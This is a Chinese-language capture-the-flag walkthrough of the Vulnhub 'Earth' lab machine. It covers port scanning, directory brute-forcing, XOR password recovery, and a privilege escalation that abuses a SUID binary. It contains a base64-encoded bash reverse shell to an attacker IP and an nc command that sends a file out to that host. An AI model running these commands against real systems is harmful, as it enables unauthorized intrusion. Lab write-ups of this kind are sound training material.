Earth 靶機筆記
概述
這是一臺 Vulnhub 的靶機,主要是
Earth 靶機地址:https://vulnhub.com/entry/the-planets-earth,755/#download
一、nmap 掃描
1、埠掃描
-sT 以 TCP 全連線掃描,--min-rate 10000 以最低 10000 速率進行掃描,-p-進行全埠掃描,-o ports 結果輸出到 ports 檔案中
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.4
Nmap scan report for 192.168.52.4
Host is up (0.00042s latency).
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds
2、詳細資訊掃描
以-sT 以 tcp, -sV 探測版本, -sC 以預設指令碼 掃描埠 $ports,-O 探測作業系統版本,輸出到 details 檔案中
sudo nmap -sT -sV -sC -p22,80,443 -O -o nmapscan/details 192.168.52.4
結果:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:5D:22:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds
看到目標的兩個域名資訊 earth.local,terratest.earth.local 我們將他寫到 /etc/hosts 檔案中
3、預設指令碼掃描
nmap --script=vuln -p22,80,443 -o nmapscan/vuln 192.168.52.4
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
443/tcp open https
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds
二、web 滲透
看到目標開放了 80 和 443 埠,我們開啟看看
80 埠
443 埠
是一個 webserver 的預設頁面
我們還有兩個域名同時也看一下,發現兩個域名所透露出來的資訊是一樣的
看樣子是一個訊息反饋的頁面,而下面有 Previous Messages 也就是 曾經的訊息 看樣子是加密了,而解密出來很可能是我們感興趣的內容。
走到這裡我們可以進行目錄爆破了,從而充分擴大我們的攻擊面
sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
同時還可以加引數 -x zip,tar,txt 等字尾,擴大字典再次進行第二次掃描
透過目錄爆破我們發現了 https://earth.local 下面有一個 /admin 的頁面
是一個登陸頁面
我們所知道的資訊也就這些,當然我們在後邊嘗試幾個可能的路徑,像是:/robots.txt 這類的目錄
在 terratest.earth.local 域名下發現了一個 /testingnotes.*,嘗試 fuzz 一下,發現是 /testingnotes.txt
發現了一段話
關鍵的資訊有:
採用 XOR,也就是異或加密
testdata.txt 內容是加密的金鑰
terra 是使用者名稱
檢視 testdata.txt 內容
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
我們來到 CyberChef 解密內容
解密成功 earthclimatechangebad4humans 的重複字串
這個應該就是密碼,嘗試在 admin 頁面登陸
登入成功看到是一個命令執行的框
三、獲得立足點
構造反彈 shell payload
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash
在網頁執行這個
kali 端開啟監聽
sudo rlwrap -cAr nc -lvnp 4444
成功獲得了初始的 shell
在 /var/earth_web 翻找到了 user 的 flag
四、提權到 root
find / -perm -4000 -type f 2> /dev/null
有一個 reset_root 檔案,令我們很感興趣,執行看看
看來執行失敗了
利用 nc 傳輸到 kali 本地進行分析
kali 執行
nc -lvp 4444 > reset_root
靶機執行
cat /usr/bin/reset_root | nc 192.168.52.3 4444
看到傳輸完成
chmod +x reset_root
利用 file 檢視檔案屬性
file reset_root
看到就是 linux 的可執行檔案
利用 ltrace 看看它的函式呼叫
ltrace ./reset_root
看到有幾個檔案是不存在的
程式嘗試訪問
/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5和/tmp/kcM0Wewe這些檔案,但訪問失敗(返回值為-1)
在靶機上建立這些檔案
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
再次執行
reset_root
看到 root 密碼已經被我們重置為了 Earth
成功獲得了 root 許可權
找到了 root_flag
來一張照吧
[root@earth ~]# whoami
whoami
root
[root@earth ~]# uname -a
uname -a
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
[root@earth ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33
valid_lft 1730sec preferred_lft 1730sec
inet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute
valid_lft forever preferred_lft forever
[root@earth ~]# cat /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
這臺靶機就被我們拿下了
最後
happy hacking ~~~